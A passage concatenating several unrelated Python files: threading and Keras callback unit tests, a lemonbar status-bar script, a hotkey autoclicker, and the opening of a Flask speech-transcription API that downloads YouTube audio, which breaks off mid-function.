            t = EHThread(target=self.worker, args=[queue])
            t.start()
            t.join()
            eq_(queue.get(block=False), 7)
            ok_(queue.empty())
        def catches_exceptions(self):
            """Worker exception is captured and exposed via .exception()."""
            # Induce exception by submitting a bad queue obj
            t = EHThread(target=self.worker, args=[None])
            t.start()
            t.join()
            wrapper = t.exception()
            ok_(isinstance(wrapper, ExceptionWrapper))
            eq_(wrapper.kwargs, {'args': [None], 'target': self.worker})
            eq_(wrapper.type, AttributeError)
            ok_(isinstance(wrapper.value, AttributeError))
        def exhibits_is_dead_flag(self):
            """is_dead is True after a crash, False after clean completion."""
            t = EHThread(target=self.worker, args=[None])
            t.start()
            t.join()
            ok_(t.is_dead)
            t = EHThread(target=self.worker, args=[Queue()])
            t.start()
            t.join()
            ok_(not t.is_dead)
    class via_subclassing:
        """Thread created by overriding _run() in a subclass."""
        def setup(self):
            class MyThread(EHThread):
                def __init__(self, *args, **kwargs):
                    self.queue = kwargs.pop('queue')
                    super(MyThread, self).__init__(*args, **kwargs)
                def _run(self):
                    self.queue.put(7)
            self.klass = MyThread
        def base_case(self):
            """Happy path: _run() executes and its result lands on the queue."""
            queue = Queue()
            t = self.klass(queue=queue)
            t.start()
            t.join()
            eq_(queue.get(block=False), 7)
            ok_(queue.empty())
        def catches_exceptions(self):
            """_run() exception is captured; kwargs are empty for subclasses."""
            # Induce exception by submitting a bad queue obj
            t = self.klass(queue=None)
            t.start()
            t.join()
            wrapper = t.exception()
            ok_(isinstance(wrapper, ExceptionWrapper))
            eq_(wrapper.kwargs, {})
            eq_(wrapper.type, AttributeError)
            ok_(isinstance(wrapper.value, AttributeError))
        def exhibits_is_dead_flag(self):
            """is_dead is True after a crash, False after clean completion."""
            t = self.klass(queue=None)
            t.start()
            t.join()
            ok_(t.is_dead)
            t = self.klass(queue=Queue())
            t.start()
            t.join()
            ok_(not t.is_dead)
|
test_callbacks.py
|
import os
import multiprocessing
import numpy as np
import pytest
from csv import Sniffer
import shutil
from keras import optimizers
from keras import initializers
from keras import callbacks
from keras.models import Sequential
from keras.layers.core import Dense, Dropout
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D, GlobalAveragePooling2D
from keras.utils.test_utils import get_test_data
from keras.utils.test_utils import keras_test
from keras import backend as K
from keras.utils import np_utils
# Shared fixture dimensions for the callback tests below.
input_dim = 2        # number of input features
num_hidden = 4       # hidden-layer width
num_class = 2        # number of output classes
batch_size = 5
train_samples = 20
test_samples = 20
@keras_test
def test_TerminateOnNaN():
    """TerminateOnNaN should stop training on the first non-finite loss."""
    np.random.seed(1337)
    (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
                                                         num_test=test_samples,
                                                         input_shape=(input_dim,),
                                                         classification=True,
                                                         num_classes=num_class)
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    cbks = [callbacks.TerminateOnNaN()]
    model = Sequential()
    # Huge constant weights (1e5) are used to drive activations, and hence
    # the loss, to overflow almost immediately.
    initializer = initializers.Constant(value=1e5)
    for _ in range(5):
        model.add(Dense(num_hidden, input_dim=input_dim, activation='relu',
                        kernel_initializer=initializer))
    model.add(Dense(num_class, activation='linear'))
    model.compile(loss='mean_squared_error',
                  optimizer='rmsprop')
    history = model.fit(X_train, y_train, batch_size=batch_size,
                        validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
    loss = history.history['loss']
    # Only one epoch should have run, and its loss should be infinite.
    assert len(loss) == 1
    assert loss[0] == np.inf
@keras_test
def test_ModelCheckpoint():
    """Exercise ModelCheckpoint across monitor/mode/save_best_only/period."""
    np.random.seed(1337)
    filepath = 'checkpoint.h5'
    (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
                                                         num_test=test_samples,
                                                         input_shape=(input_dim,),
                                                         classification=True,
                                                         num_classes=num_class)
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    # case 1: auto mode, save every epoch
    monitor = 'val_loss'
    save_best_only = False
    mode = 'auto'
    model = Sequential()
    model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
    model.add(Dense(num_class, activation='softmax'))
    model.compile(loss='categorical_crossentropy',
                  optimizer='rmsprop',
                  metrics=['accuracy'])
    cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
                                      save_best_only=save_best_only, mode=mode)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
    assert os.path.exists(filepath)
    os.remove(filepath)
    # case 2: explicit min mode
    mode = 'min'
    cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
                                      save_best_only=save_best_only, mode=mode)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
    assert os.path.exists(filepath)
    os.remove(filepath)
    # case 3: max mode on accuracy
    mode = 'max'
    monitor = 'val_acc'
    cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
                                      save_best_only=save_best_only, mode=mode)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
    assert os.path.exists(filepath)
    os.remove(filepath)
    # case 4: only save on improvement
    save_best_only = True
    cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
                                      save_best_only=save_best_only, mode=mode)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
    assert os.path.exists(filepath)
    os.remove(filepath)
    # case 5: period=2 with a templated filename -- checkpoints should only
    # exist for epochs 1 and 3 (0-indexed templating).
    save_best_only = False
    period = 2
    mode = 'auto'
    filepath = 'checkpoint.{epoch:02d}.h5'
    cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
                                      save_best_only=save_best_only, mode=mode,
                                      period=period)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=4)
    assert os.path.exists(filepath.format(epoch=1))
    assert os.path.exists(filepath.format(epoch=3))
    assert not os.path.exists(filepath.format(epoch=0))
    assert not os.path.exists(filepath.format(epoch=2))
    os.remove(filepath.format(epoch=1))
    os.remove(filepath.format(epoch=3))
@keras_test
def test_EarlyStopping():
    """Smoke-test EarlyStopping in explicit-max and auto modes."""
    np.random.seed(1337)
    (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
                                                         num_test=test_samples,
                                                         input_shape=(input_dim,),
                                                         classification=True,
                                                         num_classes=num_class)
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    model = Sequential()
    model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
    model.add(Dense(num_class, activation='softmax'))
    model.compile(loss='categorical_crossentropy',
                  optimizer='rmsprop',
                  metrics=['accuracy'])
    # patience=0 stops on the first non-improving epoch.
    mode = 'max'
    monitor = 'val_acc'
    patience = 0
    cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
    history = model.fit(X_train, y_train, batch_size=batch_size,
                        validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
    # auto mode should infer 'max' from the 'acc' metric name.
    mode = 'auto'
    monitor = 'val_acc'
    patience = 2
    cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
    history = model.fit(X_train, y_train, batch_size=batch_size,
                        validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
@keras_test
def test_EarlyStopping_reuse():
    """A single EarlyStopping instance must be reusable across fit() calls.

    Its internal wait/best state has to reset on train begin, so a second
    fit() (with the initial weights restored) also trains for at least
    `patience` epochs instead of stopping immediately.
    """
    np.random.seed(1337)
    patience = 3
    data = np.random.random((100, 1))
    labels = np.where(data > 0.5, 1, 0)
    model = Sequential((
        Dense(1, input_dim=1, activation='relu'),
        Dense(1, activation='sigmoid'),
    ))
    model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
    stopper = callbacks.EarlyStopping(monitor='acc', patience=patience)
    weights = model.get_weights()
    hist = model.fit(data, labels, callbacks=[stopper])
    assert len(hist.epoch) >= patience
    # This should allow training to go for at least `patience` epochs
    model.set_weights(weights)
    hist = model.fit(data, labels, callbacks=[stopper])
    assert len(hist.epoch) >= patience
@keras_test
def test_LearningRateScheduler():
    """LearningRateScheduler must apply schedule(epoch) before each epoch.

    With the schedule 1. / (1. + epoch) over 5 epochs (epoch indices
    0..4), the learning rate after training must be 1 / (1 + 4) = 0.2.
    """
    np.random.seed(1337)
    (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
                                                         num_test=test_samples,
                                                         input_shape=(input_dim,),
                                                         classification=True,
                                                         num_classes=num_class)
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    model = Sequential()
    model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
    model.add(Dense(num_class, activation='softmax'))
    model.compile(loss='categorical_crossentropy',
                  optimizer='sgd',
                  metrics=['accuracy'])
    cbks = [callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=5)
    # Bug fix: the original assertion `(lr - 0.2) < K.epsilon()` is true for
    # ANY lr <= 0.2 (the difference is negative or tiny), so it could never
    # fail.  Compare the absolute deviation with a tolerance instead, in the
    # same style as test_ReduceLROnPlateau below.
    assert np.isclose(float(K.get_value(model.optimizer.lr)), 0.2,
                      atol=K.epsilon())
@keras_test
def test_ReduceLROnPlateau():
    """ReduceLROnPlateau should cut the LR only when improvement stalls.

    Case 1: epsilon=10 makes every epoch look like a plateau, so the LR
    must drop from 0.1 to 0.1 * factor = 0.01 after the first epoch.
    Case 2: epsilon=0 means any decrease counts as improvement, so the LR
    stays at its initial 0.1.
    """
    np.random.seed(1337)
    (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
                                                         num_test=test_samples,
                                                         input_shape=(input_dim,),
                                                         classification=True,
                                                         num_classes=num_class)
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    def make_model():
        # Fresh deterministic model per case so the optimizer lr starts at 0.1.
        np.random.seed(1337)
        model = Sequential()
        model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
        model.add(Dense(num_class, activation='softmax'))
        model.compile(loss='categorical_crossentropy',
                      optimizer=optimizers.SGD(lr=0.1),
                      metrics=['accuracy'])
        return model
    model = make_model()
    # This should reduce the LR after the first epoch (due to high epsilon).
    cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=10, patience=1, cooldown=5)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2)
    assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.01, atol=K.epsilon())
    model = make_model()
    cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=0, patience=1, cooldown=5)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2)
    assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.1, atol=K.epsilon())
@keras_test
def test_CSVLogger():
    """CSVLogger: fresh file with custom separator, append mode, and reuse.

    case 1 writes a new log and sniffs the delimiter back out of it;
    case 2 appends to the existing file; case 3 reuses the same callback
    object for another fit().  The header must appear exactly once.
    """
    np.random.seed(1337)
    filepath = 'log.tsv'
    sep = '\t'
    (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
                                                         num_test=test_samples,
                                                         input_shape=(input_dim,),
                                                         classification=True,
                                                         num_classes=num_class)
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    def make_model():
        # Fresh deterministic model for each case.
        np.random.seed(1337)
        model = Sequential()
        model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
        model.add(Dense(num_class, activation='softmax'))
        model.compile(loss='categorical_crossentropy',
                      optimizer=optimizers.SGD(lr=0.1),
                      metrics=['accuracy'])
        return model
    # case 1, create new file with defined separator
    model = make_model()
    cbks = [callbacks.CSVLogger(filepath, separator=sep)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
    assert os.path.exists(filepath)
    with open(filepath) as csvfile:
        dialect = Sniffer().sniff(csvfile.read())
    assert dialect.delimiter == sep
    del model
    del cbks
    # case 2, append data to existing file, skip header
    model = make_model()
    cbks = [callbacks.CSVLogger(filepath, separator=sep, append=True)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
    # case 3, reuse of CSVLogger object
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
    import re
    with open(filepath) as csvfile:
        output = " ".join(csvfile.readlines())
    # Header line (containing 'epoch') must not be repeated by the appends.
    assert len(re.findall('epoch', output)) == 1
    os.remove(filepath)
@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
                    reason='Requires tensorflow backend')
def test_TensorBoard():
    """Smoke-test TensorBoard logging across fit() and fit_generator().

    Runs with and without validation data, with histograms, images,
    gradients and embeddings enabled, then checks the log directory was
    created and cleans it up.
    """
    np.random.seed(np.random.randint(1, 1e7))
    filepath = './logs_' + str(np.random.randint(1, 1e4))
    (X_train, y_train), (X_test, y_test) = get_test_data(
        num_train=train_samples,
        num_test=test_samples,
        input_shape=(input_dim,),
        classification=True,
        num_classes=num_class)
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    def data_generator(train):
        # Endless generator cycling over the train or test split in batches.
        if train:
            max_batch_index = len(X_train) // batch_size
        else:
            max_batch_index = len(X_test) // batch_size
        i = 0
        while 1:
            if train:
                yield (X_train[i * batch_size: (i + 1) * batch_size],
                       y_train[i * batch_size: (i + 1) * batch_size])
            else:
                yield (X_test[i * batch_size: (i + 1) * batch_size],
                       y_test[i * batch_size: (i + 1) * batch_size])
            i += 1
            i = i % max_batch_index
    def data_generator_graph(train):
        # Dict-style generator for graph-input models (not used below).
        while 1:
            if train:
                yield {'X_vars': X_train, 'output': y_train}
            else:
                yield {'X_vars': X_test, 'output': y_test}
    # case 1 Sequential
    model = Sequential()
    model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
    model.add(Dropout(0.1))
    model.add(Dense(num_class, activation='softmax'))
    model.compile(loss='categorical_crossentropy',
                  optimizer='sgd',
                  metrics=['accuracy'])
    tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1,
                                write_images=True, write_grads=True,
                                embeddings_freq=1,
                                embeddings_layer_names=['dense_1'],
                                batch_size=5)
    cbks = [tsb]
    # fit with validation data
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=3)
    # fit with validation data and accuracy
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=2)
    # fit generator with validation data
    model.fit_generator(data_generator(True), len(X_train), epochs=2,
                        validation_data=(X_test, y_test),
                        callbacks=cbks)
    # fit generator without validation data
    model.fit_generator(data_generator(True), len(X_train), epochs=2,
                        callbacks=cbks)
    # fit generator with validation data and accuracy
    model.fit_generator(data_generator(True), len(X_train), epochs=2,
                        validation_data=(X_test, y_test),
                        callbacks=cbks)
    # fit generator without validation data and accuracy
    model.fit_generator(data_generator(True), len(X_train), epochs=2,
                        callbacks=cbks)
    assert os.path.exists(filepath)
    shutil.rmtree(filepath)
@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
                    reason='Requires tensorflow backend')
def test_TensorBoard_convnet():
    """TensorBoard smoke test for a small convnet (histograms + images)."""
    np.random.seed(np.random.randint(1, 1e7))
    filepath = './logs_' + str(np.random.randint(1, 1e4))
    input_shape = (16, 16, 3)
    (x_train, y_train), (x_test, y_test) = get_test_data(num_train=500,
                                                         num_test=200,
                                                         input_shape=input_shape,
                                                         classification=True,
                                                         num_classes=4)
    y_train = np_utils.to_categorical(y_train)
    y_test = np_utils.to_categorical(y_test)
    model = Sequential([
        Conv2D(filters=8, kernel_size=3,
               activation='relu',
               input_shape=input_shape),
        MaxPooling2D(pool_size=2),
        Conv2D(filters=4, kernel_size=(3, 3),
               activation='relu', padding='same'),
        GlobalAveragePooling2D(),
        Dense(y_test.shape[-1], activation='softmax')
    ])
    model.compile(loss='categorical_crossentropy',
                  optimizer='rmsprop',
                  metrics=['accuracy'])
    tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1,
                                write_images=True, write_grads=True,
                                batch_size=16)
    cbks = [tsb]
    model.summary()
    history = model.fit(x_train, y_train, epochs=2, batch_size=16,
                        validation_data=(x_test, y_test),
                        callbacks=cbks,
                        verbose=0)
    # The callback must have created the log directory.
    assert os.path.exists(filepath)
    shutil.rmtree(filepath)
@keras_test
def test_CallbackValData():
    """Callbacks must see the same validation_data from fit() and
    fit_generator(): the triple (x, y, sample_weights)."""
    np.random.seed(1337)
    (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
                                                         num_test=test_samples,
                                                         input_shape=(input_dim,),
                                                         classification=True,
                                                         num_classes=num_class)
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    model = Sequential()
    model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
    model.add(Dense(num_class, activation='softmax'))
    model.compile(loss='categorical_crossentropy',
                  optimizer='sgd',
                  metrics=['accuracy'])
    cbk = callbacks.LambdaCallback(on_train_end=lambda x: 1)
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=[cbk], epochs=1)
    def data_generator(train):
        # Endless batch generator over the chosen split.
        if train:
            max_batch_index = len(X_train) // batch_size
        else:
            max_batch_index = len(X_test) // batch_size
        i = 0
        while 1:
            if train:
                yield (X_train[i * batch_size: (i + 1) * batch_size],
                       y_train[i * batch_size: (i + 1) * batch_size])
            else:
                yield (X_test[i * batch_size: (i + 1) * batch_size],
                       y_test[i * batch_size: (i + 1) * batch_size])
            i += 1
            i = i % max_batch_index
    cbk2 = callbacks.LambdaCallback(on_train_end=lambda x: 1)
    model.fit_generator(data_generator(True), len(X_train), epochs=1,
                        validation_data=(X_test, y_test),
                        callbacks=[cbk2])
    # callback validation data should always have x, y, and sample weights
    assert len(cbk.validation_data) == len(cbk2.validation_data) == 3
    assert cbk.validation_data[0] is cbk2.validation_data[0]
    assert cbk.validation_data[1] is cbk2.validation_data[1]
    assert cbk.validation_data[2].shape == cbk2.validation_data[2].shape
@keras_test
def test_LambdaCallback():
    """LambdaCallback's on_train_end hook must fire after fit() completes.

    Verified by letting the hook terminate a busy-spinning helper process:
    if the hook fires, join() returns and the process is dead.
    """
    np.random.seed(1337)
    (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
                                                         num_test=test_samples,
                                                         input_shape=(input_dim,),
                                                         classification=True,
                                                         num_classes=num_class)
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    model = Sequential()
    model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
    model.add(Dense(num_class, activation='softmax'))
    model.compile(loss='categorical_crossentropy',
                  optimizer='sgd',
                  metrics=['accuracy'])
    # Start an arbitrary process that should run during model training and be terminated after training has completed.
    def f():
        while True:
            pass
    p = multiprocessing.Process(target=f)
    p.start()
    cleanup_callback = callbacks.LambdaCallback(on_train_end=lambda logs: p.terminate())
    cbks = [cleanup_callback]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=5)
    p.join()
    assert not p.is_alive()
@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
                    reason="Requires tensorflow backend")
def test_TensorBoard_with_ReduceLROnPlateau():
    """TensorBoard must coexist with ReduceLROnPlateau in one callback list."""
    import shutil
    np.random.seed(np.random.randint(1, 1e7))
    filepath = './logs_' + str(np.random.randint(1, 1e4))
    (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
                                                         num_test=test_samples,
                                                         input_shape=(input_dim,),
                                                         classification=True,
                                                         num_classes=num_class)
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    model = Sequential()
    model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
    model.add(Dense(num_class, activation='softmax'))
    model.compile(loss='binary_crossentropy',
                  optimizer='sgd',
                  metrics=['accuracy'])
    cbks = [
        callbacks.ReduceLROnPlateau(
            monitor='val_loss',
            factor=0.5,
            patience=4,
            verbose=1),
        callbacks.TensorBoard(
            log_dir=filepath)]
    model.fit(X_train, y_train, batch_size=batch_size,
              validation_data=(X_test, y_test), callbacks=cbks, epochs=2)
    assert os.path.exists(filepath)
    shutil.rmtree(filepath)
if __name__ == '__main__':
    # Run this test module directly through pytest.
    pytest.main([__file__])
|
__main__.py
|
"""
Joseph's lemonbar
"""
import subprocess
import time
import threading
import os
from .elements import get_battery, get_ws, get_date, get_volume, now_playing
from .constants import (
BG_COL, FG_COL, HL_COL,
GENERAL_PLACEHOLDER, TEXT_FONT, ICON_FONT
)
def restart():
    """Replace the current process with a fresh instance of the bar."""
    print("Restarting...")
    os.execvp("python3.7", ["python3.7", "-m", "bar"])
    # os.execvp wraps the execvp(3) call, which replaces the current
    # process image with a new `python3.7 -m bar`, so the bar restarts
    # without leaving the old process behind.
    # NOTE(review): the interpreter is hard-coded to python3.7 — confirm
    # this matches the installed version.
def feed_lemonbar(lemonbar: subprocess.Popen):
    """Continuously build the status line and pipe it into lemonbar's stdin.

    Refreshes battery / workspaces / date / volume / now-playing every
    0.25 s; never returns.
    """
    while True:
        ws = get_ws()
        battery = get_battery()
        date = get_date()
        volume = get_volume()
        np = now_playing()
        # lemonbar formatting: %{l}/%{c}/%{r} align left/center/right,
        # %{U..+u} sets the underline color, and %{A:cmd:}...%{A} makes a
        # clickable region that writes "cmd" to lemonbar's stdout
        # (consumed by consume_lemonbar).
        bar_string = (
            f"%{{O10000}}"
            f"%{{U{HL_COL}+u}}"
            f"%{{l}}{battery}"
            f"{GENERAL_PLACEHOLDER}"
            f"{ws}"
            f"{GENERAL_PLACEHOLDER}"
            f"%{{A:restart:}}\uf0e2%{{A}}"
            f"%{{c}}{date}"
            f"%{{r}}"
            f"{GENERAL_PLACEHOLDER}"
            f"{np}"
            f"{volume}\n"
        )
        lemonbar.stdin.write(bar_string.encode())
        lemonbar.stdin.flush()
        time.sleep(0.25)
def consume_lemonbar(lemonbar: subprocess.Popen):
    """Dispatch click commands emitted by lemonbar on its stdout.

    Recognised commands:
      * ``restart``      -- re-exec the bar (see :func:`restart`)
      * ``switch-<d>``   -- focus bspwm desktop ``<d>``
    """
    while True:
        raw = lemonbar.stdout.readline()
        if not raw:
            # EOF: lemonbar exited.  The original looped forever on b"",
            # busy-spinning; stop the consumer thread instead.
            break
        # Decode and strip once (the original re-stripped on every test).
        data = raw.decode().strip()
        if data == "restart":
            restart()
        elif data.startswith("switch-"):
            desktop = data[7:]  # text after the "switch-" prefix
            os.popen(f"bspc desktop {desktop} -f")
if __name__ == "__main__":
    # Launch lemonbar with our colors/fonts; keep both pipes so we can
    # feed the status line (stdin) and read click commands (stdout).
    lemonbar = subprocess.Popen(f"lemonbar "
                                f"-F \\{FG_COL} "
                                f"-B \\{BG_COL} "
                                f"-f {TEXT_FONT} "
                                f"-f {ICON_FONT} "
                                f"-u 0 -o 0 -g 1366x25+0+0",
                                stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
    # Producer thread: writes the status line; consumer: handles clicks.
    feeder = threading.Thread(target=feed_lemonbar, args=(lemonbar,))
    feeder.start()
    consumer = threading.Thread(target=consume_lemonbar, args=(lemonbar,))
    consumer.start()
|
main.py
|
import time
from threading import Thread
import keyboard
import mouse
def event_loop():
    """Poll the module-level toggle flags once a second and fire events.

    Presses space while ``runnable_space`` is set, clicks the mouse while
    ``runnable_click`` is set, and exits when ``exit_condition`` becomes
    true (set by the win+esc handler at module level).
    """
    while True:
        if runnable_space:
            keyboard.press_and_release("space")
        if runnable_click:
            mouse.click()
        if exit_condition:
            break
        time.sleep(1)
def reverse_runnable_space():
    """Toggle the auto space-press flag (hotkey: win+shift+u)."""
    global runnable_space
    runnable_space = not runnable_space
def reverse_runnable_click():
    """Toggle the auto mouse-click flag (hotkey: win+shift+c)."""
    global runnable_click
    runnable_click = not runnable_click
# Shared flags polled by event_loop; flipped from the hotkey callbacks.
exit_condition = False
runnable_space = False
runnable_click = False
Thread(target=event_loop).start()
keyboard.add_hotkey("win+shift+u", reverse_runnable_space)
keyboard.add_hotkey("win+shift+c", reverse_runnable_click)
# Block until win+esc is pressed, then tell the event loop to stop.
keyboard.wait("win+esc", suppress=True)
exit_condition = True
|
flask_api.py
|
from flask import Flask, request
from flask import jsonify
from flask_cors import CORS, cross_origin
from omegaconf import OmegaConf
import numpy as np, math,torch,json
from support import load_model,W2lKenLMDecoder,W2lViterbiDecoder,load_data
import time,os
import sys
import webvtt
from nltk import sent_tokenize
# from punctuate import RestorePuncts
from yt_dlp import YoutubeDL
import ffmpeg
import datetime
import re
from gevent.pywsgi import WSGIServer
import subprocess
import io
from pydub import AudioSegment
import webrtcvad
from vad import frame_generator, vad_collector
from multiprocessing import Process
cuda = sys.argv[1]  # device string, e.g. "cuda:0" or "cpu"
# punct_model = RestorePuncts()
with open('config.json','r') as j:
    config = json.load(j)
# Per-language registry of [model, decoder, dictionary] triples.
name2model_dict = dict()
for k,m in config.items():
    # NOTE(review): eval() on a config value — the config file is assumed
    # trusted; 'lm_usage' is expected to be "True"/"False".
    if eval(m['lm_usage']):
        # KenLM-backed beam-search decoding.
        lmarg = OmegaConf.create(m['lm_details'])
        lmarg.unk_weight = -math.inf
        model,dictionary = load_model(m['model_path'])
        if cuda != 'cpu' and torch.cuda.is_available():
            model.to(cuda)
        generator = W2lKenLMDecoder(lmarg, dictionary)
    else:
        # No language model: plain Viterbi decoding.
        lmarg = OmegaConf.create({'nbest':1})
        model,dictionary = load_model(m['model_path'])
        if cuda != 'cpu' and torch.cuda.is_available():
            model.to(cuda)
        generator = W2lViterbiDecoder(lmarg, dictionary)
    name2model_dict[k] = [model,generator,dictionary]
def align(fp_arr,cuda):
    """Transcribe a raw float waveform with the English model.

    fp_arr: 1-D float numpy waveform (callers pass 16 kHz mono audio —
            TODO confirm the models expect exactly that rate).
    cuda:   device string; anything other than 'cpu' moves tensors to it
            when CUDA is available.
    Returns the decoded transcript as a plain string.
    """
    feature = torch.from_numpy(fp_arr).float()
    if cuda != 'cpu' and torch.cuda.is_available():
        feature = feature.to(cuda)
    # fairseq-style input dict with a batch dimension of 1.
    sample = {"net_input":{"source":None,"padding_mask":None}}
    sample["net_input"]["source"] = feature.unsqueeze(0)
    if cuda != 'cpu' and torch.cuda.is_available():
        sample["net_input"]["padding_mask"] = torch.BoolTensor(sample["net_input"]["source"].size(1)).fill_(False).unsqueeze(0).to(cuda)
    else:
        sample["net_input"]["padding_mask"] = torch.BoolTensor(sample["net_input"]["source"].size(1)).fill_(False).unsqueeze(0)
    model,generator,dictionary = name2model_dict['en']
    with torch.no_grad():
        hypo = generator.generate([model], sample, prefix_tokens=None)
    hyp_pieces = dictionary.string(hypo[0][0]["tokens"].int().cpu())
    # The decoder emits letters with '|' as the word separator; collapse
    # the letter spacing and turn '|' back into spaces.
    tr = hyp_pieces.replace(' ','').replace('|',' ').strip()
    return tr
#----------------------------------------------
# Local folder where downloaded media is stored (served by Flask /static).
MEDIA_FOLDER = "static/media"
os.makedirs(MEDIA_FOLDER, exist_ok=True)
#ydl_opts = {'outtmpl': MEDIA_FOLDER+'/%(id)s'}
# Audio-only download options: best m4a stream, saved as <video id>.m4a.
ydl_opts_audio = {
    'format': 'bestaudio[ext=m4a]',
    'outtmpl': MEDIA_FOLDER+'/%(id)s.m4a',
}
ydl_audio = YoutubeDL(ydl_opts_audio)
def download_yt_audio(url):
    """Download the best m4a audio stream for *url*.

    Returns the local path MEDIA_FOLDER/<video id>.m4a that the
    module-level ``ydl_audio`` downloader wrote to.
    """
    video_info = ydl_audio.extract_info(url, download=True)
    return os.path.join(MEDIA_FOLDER, video_info['id']) + '.m4a'
# Video download options (currently unused — see download_yt_video).
ydl_opts_video = {
    #'format': 'bestvideo[height<=720]+bestaudio/best[height<=720]',
    'outtmpl': MEDIA_FOLDER+'/%(id)s.webm'
}
ydl_video = YoutubeDL(ydl_opts_video)
def download_yt_video(yt_url):
    """Stub: video download is currently disabled; echo the URL back.

    The real implementation (kept below for reference) would run
    ``ydl_video.extract_info`` and return the local ``.webm`` path.
    """
    return yt_url
    #info = ydl_video.extract_info(yt_url, download=True)
    #downloaded_video_path = os.path.join(MEDIA_FOLDER, info['id']) + '.webm'
    #return downloaded_video_path
app = Flask(__name__)
cors = CORS(app)
app.config['CORS_HEADERS'] = 'Content-Type'
@app.route("/")
@cross_origin()
def hello_world():
    """Health-check endpoint: confirms the API is up."""
    return "<p>Hi</p>"
@app.route("/download_video_to_local", methods=['POST'])
def download_video_to_local():
    """Download a YouTube video's audio locally and return playback URLs.

    Form params: url — the YouTube page URL.
    Downloads the m4a audio synchronously, resolves a direct streaming URL
    for the best-quality format, and kicks off the (currently stubbed)
    video download in a background process.
    """
    yt_url = request.form['url']
    ydl_best = YoutubeDL({'format': 'best'})
    downloaded_audio_path = download_yt_audio(yt_url)
    # Resolve metadata only (no download) to get the direct stream URL.
    info = ydl_best.extract_info(yt_url, download=False)
    print(info.keys())
    direct_url = info['url']
    print(direct_url)
    if os.path.isfile(downloaded_audio_path):
        # Video will be downloaded in background
